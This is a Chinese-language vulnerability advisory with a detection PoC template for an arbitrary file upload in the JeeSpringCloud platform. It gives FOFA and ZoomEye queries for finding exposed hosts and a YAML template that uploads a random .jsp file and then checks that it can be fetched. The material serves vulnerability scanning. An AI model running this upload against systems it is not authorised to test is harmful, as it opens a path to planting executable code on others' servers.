漏洞描述
JeeSpringCloud 是一款免费开源的 Java 互联网云快速开发平台,JeeSpringCloud 访问 /static/uploadify/uploadFile.jsp 可上传任意文件。
FOFA: header="com.jeespring.session.id"
ZoomEye: header:"com.jeespring.session.id"
jeespringcloud-uploadfile-fileupload: JeeSpringCloud uploadFile.jsp 任意文件上传
PoC代码[已公开]
id: jeespringcloud-uploadfile-fileupload
info:
name: JeeSpringCloud uploadFile.jsp 任意文件上传
author: zan8in
severity: critical
verified: true
description: |-
JeeSpringCloud 是一款免费开源的 Java 互联网云快速开发平台,JeeSpringCloud 访问 /static/uploadify/uploadFile.jsp 可上传任意文件。
FOFA: header="com.jeespring.session.id"
ZoomEye: header:"com.jeespring.session.id"
tags: jeespringcloud,fileuplaod
created: 2023/11/06
set:
randstr: randomLowercase(6)
randbody: randomLowercase(56)
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /static/uploadify/uploadFile.jsp?uploadPath=/static/uploadify/
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"fileshare\"; filename=\"{{randstr}}.jsp\"\r\n\
Content-Type: image/jpeg\r\n\
\r\n\
{{randbody}}\r\n\
\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: response.status == 200 && response.body.bcontains(b'.jsp')
output:
search: '"(?P<bodystr>.+?).jsp".bsubmatch(response.body)'
bodystr: search["bodystr"]
r1:
request:
method: GET
path: /static/uploadify/{{bodystr}}.jsp
expression: response.status == 200 && response.body.bcontains(bytes(randbody))
expression: r0() && r1()